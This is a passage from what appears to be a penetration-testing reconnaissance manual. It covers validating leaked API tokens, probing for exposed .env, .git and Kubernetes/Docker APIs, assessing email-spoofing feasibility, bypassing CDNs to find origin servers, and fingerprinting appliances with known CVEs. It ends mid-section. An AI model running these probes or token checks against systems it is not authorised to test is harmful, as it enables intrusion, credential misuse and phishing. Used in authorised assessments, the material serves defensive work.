curl -sk -m 10 -H "Authorization: Bearer sk-..." https://api.openai.com/v1/models | jq '.data | length'

# npm
curl -sk -m 10 -H "Authorization: Bearer npm_..." https://registry.npmjs.org/-/whoami | jq .

# Atlassian (account)
curl -sk -m 10 -u "email:ATATT3xFfGF0_..." https://your-domain.atlassian.net/rest/api/3/myself | jq .

# DataDog (API + APP key both required)
curl -sk -m 10 -H "DD-API-KEY: ..." -H "DD-APPLICATION-KEY: ..." https://api.datadoghq.com/api/v1/validate | jq .

Bulk webapp triage (httpx, faster than curl loop):

# Install: go install github.com/projectdiscovery/httpx/cmd/httpx@latest
echo "target.example" | httpx -sc -title -tech-detect -web-server -ip -cdn -follow-redirects

# With probe list
cat subdomains.txt | httpx -sc -title -tech-detect -path /actuator/env,/.git/config,/.env -mc 200,301,403

Save responses for evidence:

mkdir -p evidence/$(date -u +%Y%m%d)
T="https://target.example"
P="/actuator/env"
TS=$(date -u +%Y%m%dT%H%M%SZ)
SAFE_NAME=$(echo "${T}${P}" | tr '/:' '_')
curl -sk -m 10 "$T$P" -o "evidence/$(date -u +%Y%m%d)/${TS}_${SAFE_NAME}.body" \
  -D "evidence/$(date -u +%Y%m%d)/${TS}_${SAFE_NAME}.headers"
sha256sum "evidence/$(date -u +%Y%m%d)/${TS}_${SAFE_NAME}".* > "evidence/$(date -u +%Y%m%d)/${TS}_${SAFE_NAME}.sha256"

16.14 Email Security Analysis (SPF/DMARC/DKIM/BIMI/MTA-STS/DNSSEC)

Spoof feasibility + SaaS tenant inference from a target's email DNS.

SPF lookup + parsing:

D="target.example"
dig +short TXT "$D" | grep -i 'v=spf1'

Common SPF parsing checklist:

  • Ends in -all (hardfail) → strict; major providers reject spoofs.
  • Ends in ~all (softfail) → spam folder for spoofs.
  • Ends in ?all or no all → permissive; spoofs likely deliver.
  • Includes (include:) reveal SaaS tenants:
    • include:_spf.google.com → Google Workspace.
    • include:spf.protection.outlook.com → Microsoft 365.
    • include:_spf.salesforce.com → Salesforce.
    • include:mail.zendesk.com → Zendesk customer.
    • include:sendgrid.net → SendGrid customer.
    • include:mailgun.org → Mailgun customer.
    • include:_spf.atlassian.net → Atlassian Cloud.
    • include:amazonses.com → AWS SES.
    • include:mktomail.com → Marketo.
    • include:_spf.intuit.com → Intuit (QuickBooks/Mailchimp).
    • include:spf.mandrillapp.com → Mandrill.
    • include:_spf.workday.com → Workday.

If SPF includes ≥10 mechanisms (max-lookups limit) → SPF eval likely fails → spoofs may pass. Tools: spfquery, spftools (online), dig +trace.

DMARC policy + alignment:

dig +short TXT "_dmarc.${D}"

Parse for:

  • p= → primary policy (none, quarantine, reject).
  • sp= → subdomain policy (defaults to p=).
  • aspf= / adkim= → alignment mode (r=relaxed, s=strict).
  • pct= → percentage of mail to which policy applies.
  • rua= / ruf= → reporting addresses (often reveals SaaS DMARC vendors: dmarcian, valimail, Agari, easydmarc).

Severity:

  • p=none → spoof-feasible, downgrade trust → MEDIUM finding.
  • p=quarantine pct<100 → partial enforcement → LOW.
  • p=reject + aspf=s + adkim=s → well-postured → no finding.

DKIM key discovery:

DKIM selectors aren't well-known; common patterns:

for selector in default google selector1 selector2 mail email k1 dkim s1 s2 mta1 mta2 \
                amazonses 20240101 20230101 mailchimp sendgrid mxvault; do
  echo "=== ${selector} ==="
  dig +short TXT "${selector}._domainkey.${D}"
done

If a key returns: extract p=<base64> and check key length. RSA-1024 → MEDIUM (deprecated; should be 2048+). Missing or rotated infrequently → LOW finding.

BIMI (Brand Indicators for Message Identification):

dig +short TXT "default._bimi.${D}"

If present + p=reject DMARC → brand-impersonation defense in inbox UI. Absence is LOW only (operational, not exploitable).

MTA-STS (Mail Transfer Agent Strict Transport Security):

dig +short TXT "_mta-sts.${D}"
curl -sk -m 10 "https://mta-sts.${D}/.well-known/mta-sts.txt"

If neither responds → MX-server TLS not enforced; MITM-able. LOW finding. If mode=enforce present and policy file matches → well-postured.

TLS-RPT (TLS Reporting):

dig +short TXT "_smtp._tls.${D}"

DNSSEC validation:

dig +dnssec "${D}" SOA | grep -E 'flags|RRSIG'
delv "${D}" 2>&1 | grep -i 'fully validated\|insecur'

If delv returns "insecure" → DNSSEC not enabled (LOW finding; doesn't enable spoof but is hardening gap).

MX → IdP / mail-host inference:

dig +short MX "${D}"
MX pattern IdP / hosting
aspmx.l.google.com, *.googlemail.com Google Workspace
*.mail.protection.outlook.com Microsoft 365
*.mail.eo.outlook.com Microsoft 365 (older)
*.zoho.com Zoho Mail
*.yandex.net Yandex 360
*.fastmail.com Fastmail
*.proofpoint.com, *.pphosted.com Proofpoint (M365 user with Proofpoint inbound)
*.mimecast.com, *.mimecast-eu.com Mimecast
*.barracudanetworks.com Barracuda
Self-hosted IPs in target ASN On-prem mail server (often Exchange)

DMARC reporting-vendor inference (parse rua= / ruf=):

RUA/RUF host Vendor Implication
*.dmarcian.com dmarcian DMARC reporting customer
*.valimail.com, *.dmarc-rua.com Valimail DMARC reporting customer
*.kdmarc.com Kratikal kDMARC Indian DMARC vendor; common in IN orgs
*.agari.com Agari (Fortra) Email security vendor
*.easydmarc.com EasyDMARC DMARC reporting customer
*.dmarcanalyzer.com DMARC Analyzer Reporting customer
*.postmarkapp.com Postmark DMARC reporting addon
<addr>@<target-domain> Self-hosted reporting Internal mailbox; sometimes leaks team-name (itg@, secops@, dmarc@)

Capture the vendor + the internal RUA mailbox. Both are leak surfaces (vendor compromise = DMARC bypass; internal mailbox = phishing target).

Windows / PowerShell parallel for the entire §16.14 audit:

PS 5.1 Resolve-DnsName does not accept -Type CAA (use PowerShell 7+ or nslookup -type=CAA <domain>). Otherwise:

$D = "target.example"
"=== SPF ==="; (Resolve-DnsName $D -Type TXT -EA SilentlyContinue | ? { $_.Strings -match 'v=spf1' }).Strings
"=== DMARC ==="; (Resolve-DnsName "_dmarc.$D" -Type TXT -EA SilentlyContinue).Strings
"=== MTA-STS ==="; (Resolve-DnsName "_mta-sts.$D" -Type TXT -EA SilentlyContinue).Strings
"=== TLS-RPT ==="; (Resolve-DnsName "_smtp._tls.$D" -Type TXT -EA SilentlyContinue).Strings
"=== BIMI ==="; (Resolve-DnsName "default._bimi.$D" -Type TXT -EA SilentlyContinue).Strings
"=== MX ==="; Resolve-DnsName $D -Type MX -EA SilentlyContinue | Select NameExchange,Preference
"=== DKIM common selectors ==="
foreach ($s in @("default","google","selector1","selector2","mail","email","k1","dkim","s1","s2","amazonses","mailchimp","sendgrid","mxvault","20240101","zoho","zmail","outlook","o365")) {
  $r = Resolve-DnsName "$s._domainkey.$D" -Type TXT -EA SilentlyContinue
  if ($r) { "${s}: FOUND" }
}
"=== CAA (PS 5.1 fallback) ==="; nslookup -type=CAA $D 2>$null

16.15 Origin Discovery / CDN Bypass

If the target is behind Cloudflare/Akamai/Fastly/CloudFront, their CDN IPs are well-defined. Find IPs not in those ranges that serve the same site = origin.

Cloudflare IPv4 ranges:

https://www.cloudflare.com/ips-v4

Akamai ASNs: AS16625, AS20940, AS21342, AS21357. Fastly: AS54113. AWS CloudFront: published in https://ip-ranges.amazonaws.com/ip-ranges.json filter service:CLOUDFRONT.

Origin discovery via DNS history:

# SecurityTrails (paid)
curl -sk -H "APIKEY: ..." \
  "https://api.securitytrails.com/v1/history/${D}/dns/a" | jq '.records[] | {ip:.values[].ip, first_seen, last_seen}'

Free alternatives:

# Validin
curl -sk "https://app.validin.com/api/axon/${D}/dns" | jq .

# RiskIQ Community (free tier; auth required)
curl -sk -u "user:apikey" "https://api.riskiq.net/pt/v2/dns/passive?query=${D}" | jq .

Filter the result: any historical A record IP not in current CDN ranges = origin candidate.

Origin via certificate SAN pivot (Censys):

# Censys (free 250 queries/month with key)
censys search "services.tls.certificates.leaf_data.subject.common_name:${D} AND NOT services.tls.certificates.leaf_data.issuer.common_name:'Cloudflare'"

Or via crt.sh + manual IP check:

curl -sk "https://crt.sh/?q=%25.${D}&output=json" | jq -r '.[].name_value' | sort -u

Origin via favicon hash (Shodan):

# Compute favicon mmh3
python3 -c "
import urllib.request, codecs, mmh3
data = urllib.request.urlopen('https://target.example/favicon.ico').read()
b64 = codecs.encode(data, 'base64')
print(mmh3.hash(b64))"

# Search Shodan
shodan search "http.favicon.hash:<computed-hash>" --fields ip_str,port,org

Cross-reference with CDN ranges; non-CDN matches = origin candidates.

Origin via JARM:

# Compute JARM
python3 -c "
import jarm
print(jarm.scan('target.example'))
" 2>/dev/null || echo "Install: pip install pyjarm"

# Search Shodan for matching JARM
shodan search "ssl.jarm:<jarm-hash>" --fields ip_str,port

Origin via Host-header probe (validate candidate):

CANDIDATE_IP="203.0.113.42"
curl -sk -m 10 -H "Host: target.example.com" "https://${CANDIDATE_IP}/" -o /tmp/candidate.html
diff <(curl -sk -m 10 https://target.example.com/) /tmp/candidate.html | head -50

If small/no diff → confirmed origin. Document with detectability=low.

Origin via auxiliary subdomains (often skip CDN):

for sub in mail smtp ftp sftp cpanel webmail direct origin direct-connect noproxy \
           dev staging stg uat preprod sandbox preview origin-www old-www legacy \
           server srv host1 host2 vps server1; do
  echo "=== ${sub}.${D} ==="
  dig +short A "${sub}.${D}"
done | grep -vE '^(===|$)' | sort -u

Cross-reference any returned IP against CDN ranges.

Origin via email-header bounce:

Send mail to <random>@${D} from a sock-puppet account. The bounce often includes Received: headers showing the inbound mail server's actual IP — sometimes co-located with web origin.

Origin via misconfigured CDN error pages:

Some CDN 5xx error pages historically leaked upstream details. Trigger errors and inspect:

# Trigger CDN-side 5xx (oversized request, malformed Host)
curl -sk -m 10 -H "Host: " "https://target.example/" -o /tmp/err.html
curl -sk -m 10 -H "X-Forwarded-For: $(python3 -c 'print("a"*8000)')" "https://target.example/"
grep -iE 'origin|upstream|server|backend|cf-ray' /tmp/err.html

16.16 Vendor Product Fingerprints

Common edge appliances / products on the target's perimeter, with fingerprint paths and notes on common CVEs.

Product Fingerprint paths Notes
Citrix Netscaler / Gateway /vpn/index.html, /logon/LogonPoint/tmindex.html, /citrix/ Version in HTML; CVE-2023-3519 (RCE), CVE-2019-19781 (path traversal RCE) — both KEV-listed.
F5 BIG-IP TMUI /tmui/login.jsp, /mgmt/tm/sys/ Banner reveals version; CVE-2022-1388 (auth bypass), CVE-2023-46747 — KEV-listed.
Cisco ASA / AnyConnect /+CSCOE+/, /CSCOE/index.html, /webvpn.html, /+CSCOE+/portal.html CVE-2020-3452 (file read), CVE-2018-0101 (RCE).
Pulse Secure / Ivanti Connect /dana-na/, /dana-na/auth/url_default/welcome.cgi, /api/v1/ CVE-2024-21887 (KEV), CVE-2023-46805 (KEV) — chained command injection.
FortiGate / FortiOS /remote/login, /remote/info, /api/v2/ CVE-2022-42475 (RCE, KEV), CVE-2024-21762 (RCE, KEV).
PaloAlto GlobalProtect /global-protect/, /global-protect/portal/css/login.css, /api/?type=keygen CVE-2024-3400 (RCE, KEV), CVE-2019-1579.
VMware Horizon /portal/info.jsp, /broker/xml, /login.jsp log4shell exposure (CVE-2021-44228, KEV).
VMware vCenter /sdk, /ui/, /vsphere-client/, /websso/SAML2/ CVE-2021-21972 (RCE, KEV), CVE-2021-22005.
VMware ESXi /sdk, /ui/, /folder CVE-2021-21974 (heap overflow → ESXiArgs ransomware, KEV).
Microsoft Exchange OWA /owa/, /ews/exchange.asmx, /ecp/ ProxyShell (CVE-2021-34473), ProxyLogon (CVE-2021-26855), ProxyNotShell (CVE-2022-41040) — all KEV.
WatchGuard Firebox /auth/, /wgcgi.cgi CVE-2022-26318 (CGI).
SonicWall SMA /cgi-bin/welcome, /__api__/v1/, /diagnostics/ CVE-2021-20016, CVE-2024-40766 (KEV).
Sophos UTM/XG/XGS /userportal/, /webconsole/, /cgi-bin/ CVE-2022-1040 (RCE, KEV).
Check Point R80/R81 /sslvpn/portal/, /clients/ CVE-2024-24919 (KEV).
Zoho ManageEngine /RestAPI/Login, /api/json/v2/ Multiple RCE CVEs; check version.
Atlassian Confluence /confluence/, /login.action, /rest/api/space CVE-2022-26134 (OGNL RCE, KEV), CVE-2023-22515 (KEV).
Atlassian Jira /secure/Dashboard.jspa, /rest/api/2/serverInfo Multiple CVEs; check version.
GitLab self-hosted /users/sign_in, /-/oauth/applications, /help Version in HTML footer; CVE-2021-22205 (RCE, KEV).
Telerik UI /Telerik.Web.UI.WebResource.axd?type=rau CVE-2017-9248, CVE-2019-18935 — old but still found.
ConnectWise ScreenConnect /SetupWizard.aspx, /Bin/SetupWizard.aspx CVE-2024-1709 (auth bypass, KEV).
SolarWinds Orion /Orion/Login.aspx SUNBURST supply-chain (CVE-2020-10148).
Kaseya VSA /dl.asp, /userFilterTableRpt.asp CVE-2021-30116 (REvil supply-chain).
Microsoft IIS / OWA misc Server: Microsoft-IIS/<version> Old versions = old CVEs; check.
Cisco Smart Install port 4786 open CVE-2018-0171 (smart install client mode RCE).

Per-vendor probe pattern:

T="https://target.example"
# Citrix
curl -sk -m 10 "$T/vpn/index.html" -o /tmp/c1 -w '%{http_code}\n'
grep -iE 'NetScaler|Citrix|version' /tmp/c1
# F5
curl -sk -m 10 "$T/tmui/login.jsp" -o /tmp/c2 -w '%{http_code}\n'
grep -iE 'BIG-IP|version' /tmp/c2
# (etc — repeat per product)

Auto-fingerprint with Nuclei:

nuclei -u $T -t http/technologies/ -severity info,low,medium,high,critical
nuclei -u $T -t http/cves/ -severity high,critical -etags fuzz

16.17 Cloud-Native Service Fingerprints

Modern apps deploy on serverless / managed services. Fingerprint the platform from the URL pattern.

Provider URL pattern Notes
AWS Lambda Function URL *.lambda-url.<region>.on.aws Direct invocation; check IAM auth posture.
AWS App Runner *.<region>.awsapprunner.com Managed container; usually behind auth.
AWS API Gateway *.execute-api.<region>.amazonaws.com REST/HTTP/WebSocket; check authorizer config.
AWS CloudFront d{14}\.cloudfront\.net Distribution; origin behind it (see §16.15).
AWS ALB / ELB *.elb.<region>.amazonaws.com Behind = EC2 / ECS.
AWS Amplify *.amplifyapp.com Static + Lambda backend.
Google Cloud Run *.run.app (and *.<region>.run.app) Container; check public-vs-IAM auth.
Google Cloud Functions *.cloudfunctions.net, *.<region>-<project>.cloudfunctions.net Serverless.
Google App Engine *.appspot.com Older serverless.
Azure Functions *.azurewebsites.net (also App Service) Function App behind same domain pattern.
Azure Container Apps *.azurecontainerapps.io Containers.
Azure Static Web Apps *.azurestaticapps.net Static + Functions.
Vercel *.vercel.app, *.now.sh (legacy) Frontend + serverless.
Netlify *.netlify.app, *.netlify.com Frontend + functions.
Cloudflare Workers *.workers.dev Edge functions.
Cloudflare Pages *.pages.dev Static + functions.
Heroku *.herokuapp.com Dynos.
Render *.onrender.com Container/static.
Fly.io *.fly.dev Edge containers.
Railway *.railway.app App platform.
DigitalOcean App Platform *.ondigitalocean.app Static + container.

For each pattern:

  • Confirm public vs auth-required (HEAD / GET).
  • Check CORS posture.
  • For Lambda Function URLs / Cloud Run / Cloud Functions: check whether IAM auth is enforced (anonymous invocation = HIGH finding).
  • For static + functions hybrids (Vercel/Netlify/Cloudflare Pages): the function paths are usually /api/*; enumerate via JS extraction.

16.18 Container & Kubernetes Exposure

Increasingly common; often forgotten when behind a NAT.

Target Port Probe Severity if exposed
Docker API (unencrypted) 2375 curl -sk -m 5 http://${IP}:2375/v1.40/info CRITICAL (container/host takeover)
Docker API (TLS) 2376 curl -sk -m 5 https://${IP}:2376/v1.40/info HIGH (cert validation bypass possible)
Kubernetes API server 6443 / 8443 curl -sk -m 5 https://${IP}:6443/api HIGH if system:anonymous returns non-403
Kubernetes Dashboard 8001 / 9090 / 30000+ curl -sk -m 5 http://${IP}:8001/api/v1/namespaces/kube-system/services/kubernetes-dashboard HIGH if reachable
kubelet 10250 (HTTPS), 10255 (HTTP, deprecated) curl -sk -m 5 https://${IP}:10250/pods CRITICAL (no auth = pod exec)
etcd 2379 (client), 2380 (peer) curl -sk -m 5 https://${IP}:2379/v2/keys/ (v2) or etcdctl --endpoints=${IP}:2379 get / (v3) CRITICAL (cluster state + secrets)
kube-proxy 10256 curl http://${IP}:10256/healthz INFO
kube-controller-manager 10257 curl https://${IP}:10257/metrics MEDIUM
kube-scheduler 10259 curl https://${IP}:10259/metrics MEDIUM
cAdvisor 4194 (deprecated) curl http://${IP}:4194/metrics LOW (resource metrics)
Helm Tiller (Helm 2 — deprecated but found) 44134 helm --host ${IP}:44134 list HIGH (Tiller had cluster-admin)

Public container registries to check for leaks:

Registry Search pattern
Docker Hub https://hub.docker.com/search?q=<target-keyword>&type=image
Quay (Red Hat) https://quay.io/search?q=<target-keyword>
GitHub Container Registry (GHCR) enumerable via GitHub API: https://api.github.com/orgs/<org>/packages?package_type=container
Amazon ECR Public https://gallery.ecr.aws/?searchTerm=<keyword>
Azure Container Registry (public) varies; check for *.azurecr.io
Google Container Registry (public) https://console.cloud.google.com/gcr/images/<project>?project=<project>

Per-image scan workflow:

  1. docker pull <registry>/<image>:<tag> (or skopeo inspect).
  2. docker save <image> -o /tmp/img.tar.
  3. Extract layers; scan with secret catalog (§17).
  4. Inspect Dockerfile history (docker history <image>) — sometimes reveals build args or COPY of secrets.

16.19 CI/CD Platform Exposure

Platform Common exposure Probe
Jenkins /script (Groovy console = RCE if no auth), /asynchPeople/, /jnlpJars/jenkins-cli.jar, /computer/, /job/<name>/api/json curl -sk -m 10 "${T}/script" and curl -sk -m 10 "${T}/asynchPeople/api/json"
GitLab self-hosted /users/sign_in (version in HTML), /-/oauth/applications (auth-required), /api/v4/version, /-/snippets/<id>/raw curl -sk -m 10 "${T}/api/v4/version"
GitHub Actions workflow files .github/workflows/*.yml in any public repo Search via GitHub code search: path:.github/workflows extension:yml secrets
CircleCI config .circleci/config.yml in any repo Search: path:.circleci/config.yml
TeamCity /login.html, /agent.html?agentId=*, /admin/admin.html curl -sk -m 10 "${T}/login.html" | grep -i 'TeamCity' — version disclosure. CVE-2024-27198 (KEV).
Bamboo (Atlassian) /userlogin.action, /rest/api/latest/info curl -sk -m 10 "${T}/rest/api/latest/info"
Drone CI /api/info, /login curl -sk -m 10 "${T}/api/info"
Travis CI (legacy) .travis.yml in repos; https://api.travis-ci.com/repos/<owner>/<repo> API often exposes build env.
Argo CD /api/version, /applications curl -sk -m 10 "${T}/api/version". Check anonymous-auth posture.
Tekton /apis/tekton.dev/v1beta1/pipelineruns (K8s native) Enumerate via K8s API.
Spinnaker /gate/info, /applications curl -sk -m 10 "${T}/gate/info"
Buildkite per-org dashboards; usually behind auth. Check public agents page.

GitHub Actions secret-leak patterns to look for in workflows:

# Anti-pattern: secret echoed to log
run: echo "${{ secrets.MY_API_KEY }}"

# Anti-pattern: secret in environment without mask
env:
  KEY: ${{ secrets.MY_API_KEY }}
run: ./deploy.sh   # script may echo $KEY

# Anti-pattern: pull_request_target with checkout of fork code (CVE class)
on: pull_request_target
jobs:
  test:
    steps:
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # checks out fork code with secrets in env

16.20 Documentation / Wiki Leak Paths

Public-share features on collaboration platforms regularly leak.

Platform URL pattern What's exposed
Notion (publish page) *.notion.site/<slug> or notion.so/<workspace>/<page-id> Public page; sometimes whole workspaces published by accident.
Confluence Cloud (anonymous) <target>.atlassian.net/wiki/spaces/ Public spaces; check /wiki/display/<SPACE>/.
Atlassian Service Desk <target>.atlassian.net/servicedesk/customer/portal/<N> Sometimes lists all internal request types.
Trello board https://trello.com/b/<id>/<slug> Public board with cards; check via Google site:trello.com "${target}".
Asana public project https://app.asana.com/0/<id>/<id> Public project view.
ReadTheDocs <project>.readthedocs.io Hosted docs; "private builds" sometimes default to public.
GitBook <workspace>.gitbook.io/<book>/ Published docs; sometimes contain internal SOPs.
MkDocs / Docusaurus on subdomain docs.<target> Often contains internal architecture diagrams + setup notes.
Slab <workspace>.slab.com/posts/<id> Published posts.
Coda coda.io/d/<doc-id> Public docs.
Miro https://miro.com/app/board/<id>/ Public boards (often architecture diagrams).
Lucidchart https://lucid.app/lucidchart/<id>/view Public diagrams.
Figma https://www.figma.com/file/<key>/ Public design files; sometimes leak product spec.
GitHub Wiki github.com/<org>/<repo>/wiki Public wikis; check stale ones.
Linear linear.app/<workspace>/issue/<id> Public issues (rare but happens).
Confluence anonymous server <target>/confluence/, <target>/wiki/ (self-hosted) Anonymous read sometimes left on.
Monday.com view.monday.com/<id> Shared boards.
Wrike app.wrike.com/external/<id> External-shared spaces.

Dork-driven discovery:

site:notion.site "{target}"
site:notion.so "{target}"
site:atlassian.net "{target}"
site:trello.com "{target}"
site:miro.com "{target}"
site:lucid.app "{target}"
site:figma.com "{target}"
site:asana.com "{target}"
site:gitbook.io "{target}"
site:readthedocs.io "{target}"

16.21 WHOIS / RDAP / Historical

WHOIS gives current registrant; RDAP is the structured replacement; historical WHOIS is the pivot gold.

Current WHOIS:

whois target.example                              # standard CLI
curl -sk -m 10 "https://www.whois.com/whois/${D}"  # web fallback

RDAP (RFC 7480, structured JSON):

# IANA bootstrap → returns the registry RDAP server
curl -sk "https://rdap.org/domain/${D}" | jq .
curl -sk "https://www.iana.org/rdap" | jq .   # bootstrap registry

What to extract from WHOIS / RDAP:

  • Registrant: name, org, email, phone, address (often redacted post-GDPR but not always for non-EU registrants).
  • Registrar: enables registrar-account pivot for related domains.
  • Created / updated / expiry dates: pattern of bulk registrations = same registrant.
  • Nameservers: NS reuse pivot.
  • Status flags (clientHold, clientTransferProhibited, etc.) = posture indicators.
  • Abuse contact: useful for responsible disclosure (§30).

Historical WHOIS:

Pre-GDPR records often have unredacted contact info. Sources:

Source Notes
DomainTools Paid; gold-standard; full WHOIS history.
WhoisXML API Paid; bulk + history.
SecurityTrails Paid; WHOIS + DNS history.
viewdns.info Free WHOIS history (limited).
whoisology.com Paid; reverse WHOIS by registrant email.

Reverse-WHOIS pivots:

If you have a registrant email, search "every domain registered by this email":

# DomainTools (paid)
curl -sk -H "X-API-Username: ..." -H "X-API-Key: ..." \
  "https://api.domaintools.com/v1/reverse-whois/?terms=admin@target.example"

This finds adjacent corporate assets (subsidiary domains, brand variations, employee personal projects on corp email).

16.22 DNS Record Catalog (TXT verification tokens, MX→IdP)

For every target domain, dump all common record types:

D="target.example"
for rtype in A AAAA MX TXT NS SOA CAA SRV CNAME PTR; do
  echo "=== ${rtype} ==="
  dig +short "${D}" "${rtype}"
done

TXT record verification token catalog (each token reveals a SaaS tenancy):

TXT pattern SaaS / service Implication
google-site-verification=<token> Google Workspace / Search Console / Analytics Google tenancy.
MS=ms<digits> Microsoft 365 (older) M365 tenancy.
apple-domain-verification=<token> Apple Business Manager / iCloud Calendar Apple ecosystem.
atlassian-domain-verification=<token> Atlassian Cloud (Jira/Confluence/etc.) Atlassian customer.
facebook-domain-verification=<token> Facebook Business / Pixel FB Business.
adobe-idp-site-verification=<token> Adobe Sign / Creative Cloud Adobe customer.
docusign=<token> DocuSign DocuSign customer.
dropbox-domain-verification=<token> Dropbox Business Dropbox customer.
box-verification=<token> Box Box customer.
webexdomainverification.<id> Webex Cisco Webex.
zoom_verify_<id> Zoom Zoom customer (admin domain).
notion=<token> (rare) Notion workspace Notion enterprise.
slack-domain-verification=<token> Slack Enterprise Grid Slack EG.
asana-domain-verification=<token> Asana Enterprise Asana customer.
mongodb-site-verification=<token> MongoDB Atlas DB tenant.
_dnsauth.<token> Many ACME / Let's Encrypt CAs DNS-01 challenge in progress.
pinterest-site-verification=<token> Pinterest Business Marketing surface.
cisco-ci-domain-verification=<token> Cisco Spark / Webex Cisco.
_globalsign-domain-verification=<token> GlobalSign cert authority Cert provider.
mailru-verification:<token> Mail.ru RU presence.
yandex-verification:<token> Yandex services RU presence.
zscaler-verification-<id>-<date>-<random> Zscaler (ZIA / ZPA / ZDX) Web SSE / SASE customer; the date suffix is the verification-issued date.
cloudflare-verify=<token> Cloudflare (Zero Trust / Access / WARP) Cloudflare org-tier customer.
autosect-site-verification=<token> AutoSect (security tooling) Security vendor on tenant.
cisco-site-verification=<token> Cisco (various products) Cisco vendor.
mscid=<token> Microsoft (newer M365 verification) M365 tenancy (newer format).
_amazonses=<token> AWS SES sender verification SES sender.
salesforce-domain-verification=<token> Salesforce SF customer.
workday-domain-verification=<token> Workday Workday customer (HR + Finance).
shopify-domain-verification=<token> Shopify E-commerce customer.
klaviyo-domain-verification=<token> Klaviyo Marketing automation.
mailchimp-domain-verification=<token> Mailchimp Marketing email.
hubspot-domain-verification=<token> HubSpot CRM / marketing.
zendesk-verification=<token> Zendesk Support tenancy (also see §43).
freshworks-verification=<token> Freshworks Support / CRM customer.
intercom-verification=<token> Intercom Messaging tenancy.
loom-site-verification=<token> Loom Video.
miro-site-verification=<token> Miro Whiteboard tenancy.
gitlab-domain-verification=<token> GitLab Self-hosted or cloud verification.

Each discovered tenancy is a separate attack surface (own credentials, own MFA posture, own data).

Autodiscover-as-confirmation pattern:

autodiscover.<domain> resolving to Microsoft IP space (40.96.0.0/13, 52.96.0.0/14, 13.107.0.0/16) is definitive proof of M365 Exchange Online tenancy — even when MX records are obscured by Mimecast/Proofpoint/Barracuda inbound filtering. Probe:

Resolve-DnsName "autodiscover.$D" -Type A | Select Name,IPAddress

If IPs are in Microsoft ranges → M365_CONFIRMED. Cross-reference with getuserrealm.srf (§22.1) for tenant GUID extraction.

CAA records:

dig +short CAA "${D}"

Lists which CAs are allowed to issue certs. Absence = LOW finding (any CA can mis-issue). Presence + restrictive list = good posture.

SOA serial pattern analysis:

dig +short SOA "${D}"

Serial format YYYYMMDDNN reveals last-edit date. Pattern across multiple zones can correlate ownership.

16.23 Wayback CDX Deep Usage

The Wayback Machine has a structured query API.

Basic CDX query:

D="target.example"
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*&output=json&fl=timestamp,original&limit=10000"

Returns JSON array of [timestamp, original_url] tuples.

Useful filters:

  • &from=20200101&to=20231231 — date range.
  • &filter=mimetype:application/json — only JSON responses (often APIs).
  • &filter=mimetype:application/javascript — JS bundles.
  • &filter=statuscode:200 — only successful captures.
  • &filter=urlkey:.*api.* — only URLs containing "api".
  • &collapse=urlkey — dedup by URL.
  • &collapse=digest — dedup by content (catches identical pages re-archived).

Get specific snapshot:

TS="20231215120000"
URL="https://target.example/admin/dashboard"
curl -sk "https://web.archive.org/web/${TS}/${URL}"

Diff snapshot vs live:

LIVE=$(curl -sk -m 10 "${URL}")
ARCHIVED=$(curl -sk -m 10 "https://web.archive.org/web/${TS}/${URL}")
diff <(echo "$LIVE") <(echo "$ARCHIVED") | head -100

Save current page:

curl -sk -X POST "https://pragma.archivelab.org/" \
  -H 'Content-Type: application/json' \
  -d '{"url":"https://target.example/admin"}'

Find every archived JS:

curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.js&output=json&fl=timestamp,original&filter=statuscode:200" | \
  jq -r '.[1:][] | "\(.[0]) \(.[1])"'

For each, fetch the archived JS and run the secret catalog (§17). Old JS often had hard-coded keys later removed.

Legacy-app pivot (when *.js returns empty):

Static brochure-ware sites (older corporate sites, especially pre-2015) often have zero archived JS because the frontend was server-rendered. Pivot to legacy file extensions:

# ASP / ASP.NET classic
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.asp&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=500"

# PHP
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.php&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=500"

# JSP / .NET aspx / CGI / Coldfusion
for ext in aspx jsp cgi cfm; do
  echo "=== .$ext ==="
  curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.${ext}&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=200"
done

# JSON / XML config (sometimes leaks endpoints + creds)
for ext in json xml yml yaml ini conf; do
  echo "=== .$ext ==="
  curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*.${ext}&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=100"
done

# Anything indexed (broad sweep — useful for legacy enumeration)
curl -sk "https://web.archive.org/cdx/search/cdx?url=${D}/*&output=json&fl=timestamp,original&filter=statuscode:200&collapse=urlkey&limit=10000"

Legacy .asp / .cfm / .jsp URLs often reveal: forgotten admin panels, old user-enum endpoints, legacy auth flows, SQL-injection-prone parameters. Cross-reference with current DNS — many legacy hosts now NXDOMAIN but the URL paths sometimes survive on a renamed host.

16.24 Common-Prefix Subdomain Sweep (active, low-detectability)

Empirically: passive cert-transparency enumeration (crt.sh / VirusTotal / Subfinder) misses 20–40% of high-value subdomains because (a) many internal hosts use wildcard certs that don't expose the FQDN, (b) some hosts have never been issued public certs (HTTP-only or self-signed), (c) very-recently-provisioned hosts haven't propagated to CT log mirrors yet.

Always pair passive enum with an active prefix-probe. Detectability: low (single A-record query per host; no port scan, no HTTP).

The high-yield prefix list (ordered by hit-rate from real engagements):

www, mail, webmail, smtp, imap, pop, owa, autodiscover, ftp, sftp,
vpn, sslvpn, gateway, gp, globalprotect, citrix, fortinet, anyconnect,
api, app, apps, mobile, m,
portal, login, sso, idp, iam, identity, accounts, oauth, auth, adfs,
admin, manage, console, dashboard, cp, cpanel,
intranet, internal, hr, payroll, finance, sap, erp, crm, helpdesk, servicedesk,
support, help, kb, status, monitoring, grafana, kibana, prometheus,
docs, wiki, confluence, jira, bitbucket, gitlab, jenkins, sonar, nexus,
git, svn, repo, code,
dev, test, staging, stg, qa, uat, sandbox, preprod, preview, demo,
careers, jobs, vacancies, recruit, eapps,
shop, store, ecommerce, checkout, payments, pay, billing,
old, legacy, archive, backup, beta, v1, v2, classic,
cdn, static, assets, media, img, files, downloads, public,
ns, ns1, ns2, dns, mx, mx1, mx2,
zoom, teams, slack, lync, sip, voice, meet,
sclepro, tender, tenders, suppliers, vendor, vendors, procurement, purchase

One-liner (PowerShell):

